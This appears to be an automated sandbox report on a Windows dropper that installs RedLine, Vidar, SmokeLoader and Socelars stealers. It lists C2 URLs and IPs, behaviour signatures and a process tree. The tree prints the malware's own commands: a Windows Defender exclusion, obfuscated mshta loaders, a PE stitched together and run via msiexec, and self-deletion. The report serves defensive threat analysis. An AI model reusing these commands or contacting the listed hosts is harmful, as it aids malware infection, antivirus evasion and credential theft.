Resubmissions

10-11-2021 14:52

211110-r84p8aedej 10

09-11-2021 13:19

211109-qkrv3sfcg4 10

Analysis

  • max time kernel
    297s
  • max time network
    351s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    10-11-2021 14:52

General

  • Target

    623bb62b2bdec1c2b272fbeb0da95904b91f20f95a27dc8a59d0ca4c1010ef7c.exe

  • Size

    5.4MB

  • MD5

    15b7d616b28fb9df36d631a27dbf2e93

  • SHA1

    0019bad9cc179f7274b620da0a75728a46331500

  • SHA256

    623bb62b2bdec1c2b272fbeb0da95904b91f20f95a27dc8a59d0ca4c1010ef7c

  • SHA512

    e3a4c09bcc5d1c76ee8e3927fddaf08c3027a1e381067ac69e6688e2254158b9048899349b4fbec3e0cbbcc5a7a55ba8827e93be9641bc7f64bce17b56be7831

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

redline

Botnet

she

C2

135.181.129.119:4805

Extracted

Family

redline

Botnet

ANI

C2

194.104.136.5:46013

Extracted

Family

smokeloader

Version

2020

C2

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

48.1

Botnet

937

Attributes
  • profile_id

    937

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in System32 directory 9 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 18 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s SENS
    1⤵
      PID:1448
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s BITS
      1⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3928
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:4240
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
      • Modifies registry class
      PID:2688
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2664
      • C:\Users\Admin\AppData\Local\Temp\623bb62b2bdec1c2b272fbeb0da95904b91f20f95a27dc8a59d0ca4c1010ef7c.exe
        "C:\Users\Admin\AppData\Local\Temp\623bb62b2bdec1c2b272fbeb0da95904b91f20f95a27dc8a59d0ca4c1010ef7c.exe"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:2212
        • C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\setup_install.exe
          "C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\setup_install.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2732
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1312
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:840
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sat0222383409b5.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1644
            • C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat0222383409b5.exe
              Sat0222383409b5.exe
              4⤵
              • Executes dropped EXE
              PID:1056
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sat02f65b56a11b4e15e.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1356
            • C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02f65b56a11b4e15e.exe
              Sat02f65b56a11b4e15e.exe
              4⤵
              • Executes dropped EXE
              PID:1808
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sat02f1bced9c1.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2328
            • C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02f1bced9c1.exe
              Sat02f1bced9c1.exe
              4⤵
              • Executes dropped EXE
              PID:3556
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sat02f10ffd5a.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2220
            • C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02f10ffd5a.exe
              Sat02f10ffd5a.exe
              4⤵
              • Executes dropped EXE
              PID:2524
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sat0201b18ed65.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3980
            • C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat0201b18ed65.exe
              Sat0201b18ed65.exe
              4⤵
              • Executes dropped EXE
              • Checks SCSI registry key(s)
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              PID:3028
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sat02a56dec9f4311.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3204
            • C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02a56dec9f4311.exe
              Sat02a56dec9f4311.exe
              4⤵
              • Executes dropped EXE
              PID:756
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sat0280f31543b015.exe
            3⤵
              PID:2056
              • C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat0280f31543b015.exe
                Sat0280f31543b015.exe
                4⤵
                • Executes dropped EXE
                PID:1496
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Sat02f976b904339ba76.exe
              3⤵
                PID:1816
                • C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat02f976b904339ba76.exe
                  Sat02f976b904339ba76.exe
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2864
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im chrome.exe
                    5⤵
                      PID:4980
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im chrome.exe
                        6⤵
                        • Kills process with taskkill
                        PID:4700
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Sat024024f605a8c6ad8.exe
                  3⤵
                    PID:1812
                    • C:\Users\Admin\AppData\Local\Temp\7zS4A885C56\Sat024024f605a8c6ad8.exe
                      Sat024024f605a8c6ad8.exe
                      4⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      PID:2852
                      • C:\Users\Admin\Pictures\Adobe Films\n_pXid69GxgRkzEPzkUuP22t.exe
                        "C:\Users\Admin\Pictures\Adobe Films\n_pXid69GxgRkzEPzkUuP22t.exe"
                        5⤵
                        • Executes dropped EXE
                        PID:4584
                      • C:\Users\Admin\Pictures\Adobe Films\hvrvzZpBPMbsMKbxmc6AJVpk.exe
                        "C:\Users\Admin\Pictures\Adobe Films\hvrvzZpBPMbsMKbxmc6AJVpk.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:3804
                        • C:\Users\Admin\Pictures\Adobe Films\hvrvzZpBPMbsMKbxmc6AJVpk.exe
                          "C:\Users\Admin\Pictures\Adobe Films\hvrvzZpBPMbsMKbxmc6AJVpk.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:4296
                      • C:\Users\Admin\Pictures\Adobe Films\9F5b2PpAAMl7AAlR1v905dSI.exe
                        "C:\Users\Admin\Pictures\Adobe Films\9F5b2PpAAMl7AAlR1v905dSI.exe"
                        5⤵
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:1832
                      • C:\Users\Admin\Pictures\Adobe Films\IQzPIEY8qeUhsHPZM2uXHYqH.exe
                        "C:\Users\Admin\Pictures\Adobe Films\IQzPIEY8qeUhsHPZM2uXHYqH.exe"
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        PID:2188
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /im IQzPIEY8qeUhsHPZM2uXHYqH.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\IQzPIEY8qeUhsHPZM2uXHYqH.exe" & del C:\ProgramData\*.dll & exit
                          6⤵
                            PID:5092
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /im IQzPIEY8qeUhsHPZM2uXHYqH.exe /f
                              7⤵
                              • Kills process with taskkill
                              PID:3596
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 6
                              7⤵
                              • Delays execution with timeout.exe
                              PID:4264
                        • C:\Users\Admin\Pictures\Adobe Films\EaYx92awIaMaRuDX7e_OS9dI.exe
                          "C:\Users\Admin\Pictures\Adobe Films\EaYx92awIaMaRuDX7e_OS9dI.exe"
                          5⤵
                          • Executes dropped EXE
                          PID:4068
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4068 -s 664
                            6⤵
                            • Program crash
                            PID:4480
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4068 -s 680
                            6⤵
                            • Program crash
                            PID:4976
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4068 -s 776
                            6⤵
                            • Program crash
                            PID:4260
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4068 -s 812
                            6⤵
                            • Program crash
                            PID:4180
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4068 -s 1136
                            6⤵
                            • Program crash
                            PID:2092
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4068 -s 1168
                            6⤵
                            • Program crash
                            PID:4188
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4068 -s 1160
                            6⤵
                            • Suspicious use of NtCreateProcessExOtherParentProcess
                            • Program crash
                            PID:4716
                        • C:\Users\Admin\Pictures\Adobe Films\6dEmyC9oh8ToM7AMtpXzqlM5.exe
                          "C:\Users\Admin\Pictures\Adobe Films\6dEmyC9oh8ToM7AMtpXzqlM5.exe"
                          5⤵
                          • Executes dropped EXE
                          PID:2216
                          • C:\Users\Admin\Documents\jW1yRVqqOKAqP8tNBZPIBXGN.exe
                            "C:\Users\Admin\Documents\jW1yRVqqOKAqP8tNBZPIBXGN.exe"
                            6⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            PID:2536
                            • C:\Users\Admin\Pictures\Adobe Films\TWdu_ztv0x75orLS4bAMKcJB.exe
                              "C:\Users\Admin\Pictures\Adobe Films\TWdu_ztv0x75orLS4bAMKcJB.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:4572
                            • C:\Users\Admin\Pictures\Adobe Films\JcRVfZPJh17h4PobFf9CPpyM.exe
                              "C:\Users\Admin\Pictures\Adobe Films\JcRVfZPJh17h4PobFf9CPpyM.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:3440
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 656
                                8⤵
                                • Program crash
                                PID:4504
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 640
                                8⤵
                                • Program crash
                                PID:2376
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 772
                                8⤵
                                • Program crash
                                PID:4300
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 820
                                8⤵
                                • Program crash
                                PID:2076
                            • C:\Users\Admin\Pictures\Adobe Films\yeAZlaDC19vJEfesGDId83dA.exe
                              "C:\Users\Admin\Pictures\Adobe Films\yeAZlaDC19vJEfesGDId83dA.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:1576
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c taskkill /f /im chrome.exe
                                8⤵
                                  PID:360
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im chrome.exe
                                    9⤵
                                    • Kills process with taskkill
                                    PID:2596
                              • C:\Users\Admin\Pictures\Adobe Films\88qh6FTT3BWMbGJr2oEYpMhw.exe
                                "C:\Users\Admin\Pictures\Adobe Films\88qh6FTT3BWMbGJr2oEYpMhw.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:2808
                                • C:\Windows\SysWOW64\mshta.exe
                                  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\88qh6FTT3BWMbGJr2oEYpMhw.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\88qh6FTT3BWMbGJr2oEYpMhw.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                  8⤵
                                    PID:3048
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\88qh6FTT3BWMbGJr2oEYpMhw.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\88qh6FTT3BWMbGJr2oEYpMhw.exe" ) do taskkill -f -iM "%~NxM"
                                      9⤵
                                        PID:4620
                                        • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                          ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                          10⤵
                                          • Executes dropped EXE
                                          PID:4332
                                          • C:\Windows\SysWOW64\mshta.exe
                                            "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                            11⤵
                                              PID:4192
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                12⤵
                                                  PID:4696
                                              • C:\Windows\SysWOW64\mshta.exe
                                                "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                11⤵
                                                  PID:4300
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                    12⤵
                                                      PID:3920
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                        13⤵
                                                          PID:1936
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                          13⤵
                                                            PID:5096
                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                            msiexec -Y ..\lXQ2g.WC
                                                            13⤵
                                                            • Loads dropped DLL
                                                            PID:2888
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill -f -iM "88qh6FTT3BWMbGJr2oEYpMhw.exe"
                                                      10⤵
                                                      • Kills process with taskkill
                                                      PID:3700
                                              • C:\Users\Admin\Pictures\Adobe Films\oOWB_kagOkjjZ581xOryE0H7.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\oOWB_kagOkjjZ581xOryE0H7.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                • Checks SCSI registry key(s)
                                                • Suspicious behavior: MapViewOfSection
                                                PID:768
                                              • C:\Users\Admin\Pictures\Adobe Films\lVD3B4eQTt9E5QLplef98wwu.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\lVD3B4eQTt9E5QLplef98wwu.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                PID:436
                                              • C:\Users\Admin\Pictures\Adobe Films\ECHKgzFSTnYTQVpJAfa0AHKO.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\ECHKgzFSTnYTQVpJAfa0AHKO.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4840
                                                • C:\Users\Admin\Pictures\Adobe Films\ECHKgzFSTnYTQVpJAfa0AHKO.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\ECHKgzFSTnYTQVpJAfa0AHKO.exe" -u
                                                  8⤵
                                                  • Executes dropped EXE
                                                  PID:1796
                                              • C:\Users\Admin\Pictures\Adobe Films\gKgBkXJZK3D7auLPUNLlZb_l.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\gKgBkXJZK3D7auLPUNLlZb_l.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                • Checks whether UAC is enabled
                                                PID:4444
                                              • C:\Users\Admin\Pictures\Adobe Films\2uTENChZAxpQxMWR6x5DHDQM.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\2uTENChZAxpQxMWR6x5DHDQM.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:4396
                                                • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                  C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Adds Run key to start application
                                                  PID:1084
                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"
                                                    9⤵
                                                    • Executes dropped EXE
                                                    • Checks computer location settings
                                                    • Loads dropped DLL
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:3776
                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                      C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7ffb41bddec0,0x7ffb41bdded0,0x7ffb41bddee0
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      PID:5304
                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff7a9b39e70,0x7ff7a9b39e80,0x7ff7a9b39e90
                                                        11⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:5268
                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,12411407215554138809,17513683587530290634,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3776_2003539583" --mojo-platform-channel-handle=1692 /prefetch:8
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      PID:780
                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1628,12411407215554138809,17513683587530290634,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3776_2003539583" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1644 /prefetch:2
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      PID:4884
                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1628,12411407215554138809,17513683587530290634,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3776_2003539583" --mojo-platform-channel-handle=2180 /prefetch:8
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      PID:5472
                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1628,12411407215554138809,17513683587530290634,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3776_2003539583" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2292 /prefetch:1
                                                      10⤵
                                                      • Executes dropped EXE
                                                      • Checks computer location settings
                                                      • Loads dropped DLL
                                                      PID:3688
                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
